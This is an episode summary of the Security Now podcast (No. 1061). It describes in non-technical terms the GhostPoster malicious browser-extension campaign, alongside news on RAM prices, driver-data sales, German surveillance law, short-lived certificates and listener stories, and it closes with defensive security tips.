Security Now 1061: More GhostPosting
Hosts: Steve Gibson, Leo Laporte
Date: January 21, 2026
Episode Overview
This week, Steve Gibson and Leo Laporte discuss the resurgence and expansion of the “Ghost Poster” malicious browser extension campaign, delve into critical tech news impacting security and privacy, and answer listener questions. The episode is an engaging blend of cybersecurity insights, industry happenings, and the usual mix of humor and historical perspective. Key topics include rising RAM prices, funding for Python security, automotive data privacy, new U.S. infrastructure security strategies, bold German surveillance legislation, Let's Encrypt certificate changes, Iran’s internet disconnect, and the practical risks of browser extensions and cloud setup errors.
Main Discussion Points & Insights
1. GhostPoster Malware Returns—and Grows
[140:10]
- Recap: Four weeks ago (Ep. 1057), Steve described how 17 Firefox add-ons (“Ghost Poster” campaign) used PNG icons with steganographically hidden JavaScript to infect over 50,000 users.
- Update: New research by Layer X uncovered 17 additional malicious extensions, affecting Edge and Chrome, with over 840,000 downloads since 2020.
- Malware Mechanics:
- Stealth Payload: PNG image files inside extension packages conceal the malicious payload. The code is only activated after a 48-hour (sometimes even 5-day) dormancy period to evade detection.
- Multi-Stage Attack: Once activated, the extension connects to a command and control server, downloads further payloads, manipulates HTTP headers, and injects additional scripts for click fraud, affiliate hijacking, or further intrusions.
- Platforms Affected: Firefox, Edge, and Chrome. Oddly, Chrome had only 2 known payloads.
- Most Popular Lures: Translation tools (e.g., “Translate Selected Text with Right Click” had ~522,000 downloads), fake VPNs, Instagram downloaders, screenshot tools.
- Persistency: Extensions removed from stores remain installed and active unless the user removes them.
- Takeaway:
“Keep the things you need and that come from real, known, legitimate enterprises... Don’t install extensions just because you have room on your toolbar.” — Steve Gibson [157:21]
2. RAM Price Increases Impact Security and Infrastructure
[02:29]
- Scope: Not just PCs, but high-end enterprise firewalls and networking equipment will be hit.
- DRAM prices: Up 60–70% YoY, expected to rise an additional 50% this quarter.
- Why: AI companies buying all available DRAM for datacenters. Consumer/server RAM supply shrinking.
- Consequence:
- Firewall companies like Fortinet, Palo Alto Networks, and Check Point will face higher costs, lower margins, and likely pass these costs on.
- Steve’s tip: If you’re planning a network hardware purchase, buy now.
3. Anthropic’s $1.5M Donation to Python Software Foundation
[23:26]
- Purpose: To bolster open-source Python security, especially for the package repository PyPI.
- Features Funded: Automated proactive code review (leveraging AI, likely Anthropic’s own Claude), curated malware datasets, and enhanced developer support.
- Broader Impact: Secure supply chains for Python and all open source communities (tools to be reusable).
- Steve’s perspective: Smart move—AI vendors' ecosystems all rely on Python; hopefully, more companies step up.
4. FTC vs. General Motors: Selling Driver Data
[34:09]
- Findings: GM, via OnStar, sold precise geolocation and driving data to third parties without real consumer consent.
- FTC Order: Five-year ban on GM sharing such data with credit agencies; must offer transparency, allow data deletion, and provide opt-outs.
- Other brands involved: Allegations against Hyundai, Toyota, and Honda.
- Steve’s Commentary:
“GM knows that if their users were clearly asked whether they would like to have detailed data about their driving habits sold for GM’s profit...no one would say yes.” [39:24]
5. U.S. Critical Infrastructure: From CIPAC to ANCHOR
[48:45]
- Background: The Critical Infrastructure Partnership Advisory Council (CIPAC) enabled open (but protected) incident sharing between industry and government.
- Trump administration shut it down; now replacing it with ANCHOR (Alliance of National Councils for Homeland Operational Resilience).
- Key Details:
- Reduces bureaucracy (no endless new charters needed).
- Liability protections—a key for honest reporting—are still being worked out.
- Industry is eager for it; success will depend on legal shields.
6. Germany’s Surveillance Law: Expanding the BND
[59:19]
- BND (Bundesnachrichtendienst, Germany’s NSA equivalent) to gain authority to:
- Intercept all internet communications (not just metadata).
- Store data for six months.
- Hack foreign ISPs (including U.S. companies like Google, Meta) if uncooperative.
- Plant “federal trojans” on devices (even by entering apartments!).
- Steve’s reaction:
“Thank goodness for state-of-the-art encryption... The math is your friend.” [63:34]
Points out, though, that stored encrypted comms may eventually be broken by quantum computers—maybe.
7. Iran Plans Permanent Internet Disconnection
[83:41]
- Since January 8, 2026, Iran has been offline.
- Moves being made to block use of external messaging apps, satellite internet, and Starlink.
- Majority of Iran’s population is <34; Steve predicts it’s unsustainable long-term.
8. Let’s Encrypt “Six-Day Certificates” Are Live
[79:06]
- Short-lived (six days, 160 hours) certificates and IP-only certs now generally available.
- Goal: Further reduce window of exposure in case of certificate compromise.
- Steve’s view:
- Good as an option, but moving toward forced short terms feels “regressive” and unnecessary given improved revocation mechanisms.
- If you automate renewal, it’s a non-issue.
“It’s the being forced to use shorter life certificates for the web or for code signing that feels so wrong and regressive to me. I don’t need a nanny.” —Steve [81:51]
9. Listener Feedback Segment Highlights
- SpinRite saves SSD: Listener Don Edwards from South Africa shares before-and-after SSD benchmark charts showing SpinRite dramatically restored performance.
- MongoDB open to the internet: Cloud default configurations often expose databases unless users proactively restrict access—“ease of use” versus implied security.
- Home user hacking story: Bob’s machine was remotely compromised using a zero-interaction install of ScreenConnect; demonstrates real-world dangers of persistent logins, lack of biometric auth, and clicking on the wrong thing.
“With that convenience...comes the consequence that anyone and anything that’s able to use our persistently logged-in computer can act on our behalf.” — Steve [105:43]
10. Claude, AI, and Vibe Coding: User Success Stories & Cautions
[120:34]
- Listener Rob, a non-programmer, uses Claude + VSCode Copilot to turn product briefs into working alpha software, weeks before human developers would!
- Tips for new users:
- Understand token/context limits—start a new chat/project when they’re reached.
- Use documentation and summarization for state transfer.
- Double-check Claude’s work (it will “lie” or hallucinate).
- Leo’s advice: Explore plugins, best practices, and “skills” for Claude.
- Steve’s observation:
“It all feels like first steps… but it feels like it’s going to change the world.” [133:54]
Notable Quotes & Moments
“There’s probably some diagnosis. I’m sure. We’re all on the spectrum somewhere.”
– Leo Laporte re: ADHD and geek curiosity [01:40]
“The phrase free VPN is an oxymoron.”
– Steve Gibson [141:29]
“If you’re going to trust something that has crypto in it, it has to be open source crypto…”
– Leo on Bitwarden [08:39]
“Turn none of mine off... It’s just 24/7.”
– Steve on never shutting down servers [114:28]
“You just have to remember—you can’t know what you don’t know. There’s no point in getting overly worked up… Worry about what you can control: don’t install stuff you don’t need.”
– Steve [156:56]
Timestamps for Important Segments
- GhostPoster Recap & Expansion: 140:10 – 157:21
- RAM Prices & Enterprise Hardware Impact: 2:29 – 8:29
- Python Foundation/Anthropic Funding: 23:26 – 29:46
- GM Driver Data Sale & FTC Action: 34:09 – 41:09
- CPAC to ANCHOR, US Infrastructure: 48:45 – 59:17
- German Surveillance Legislation: 59:19 – 67:16
- Let’s Encrypt 6-Day Certs: 79:06 – 83:41
- Iran’s Internet Shutdown: 83:41 – 84:40
- Listener SSD Repair Story: 85:39 – 91:00
- Browser Extension Security Advice: 155:09 – 158:08
- Claude AI/Vibe Coding Experiences: 120:34 – 135:38
Security & Privacy Tips from This Episode
- Extensions: Only install those you absolutely need from trusted sources. Remove old/unneeded extensions regularly.
- Cloud Services: Default to private networks; never assume public cloud instances are secure out of the box.
- Persistent Logins: For services like PayPal, log out when possible; consider biometric or two-factor authentication for sensitive actions.
- Certificates: Automate certificate renewal if feasible; for most, six-day certs are unnecessary unless you handle very high-risk assets.
- Personal Data: Take proactive steps (e.g., DeleteMe) to reduce your digital footprint; be wary of data brokers.
Episode Tone / Style
The style remains as always: friendly, accessible, fun, anecdotal yet highly technical, with a healthy dose of skepticism and nostalgia. Leo and Steve riff on everything from 90s video stores and old-school hardware buying strategies to the wild west of current AI development.
Final Thoughts
Security Now #1061 is essential listening for practitioners, developers, and any tech-aware user. It’s a reminder that threat actors, vulnerabilities, and technology are evolving—so too must your skepticism and security hygiene. Above all, the episode’s main lesson: install less, question more—whether browser add-ons or that innocuous cloud “one-click” feature.
Next up: The last episode of January, where Steve and Leo promise to keep their eye on fast-moving threats, confused legislation, and all things security.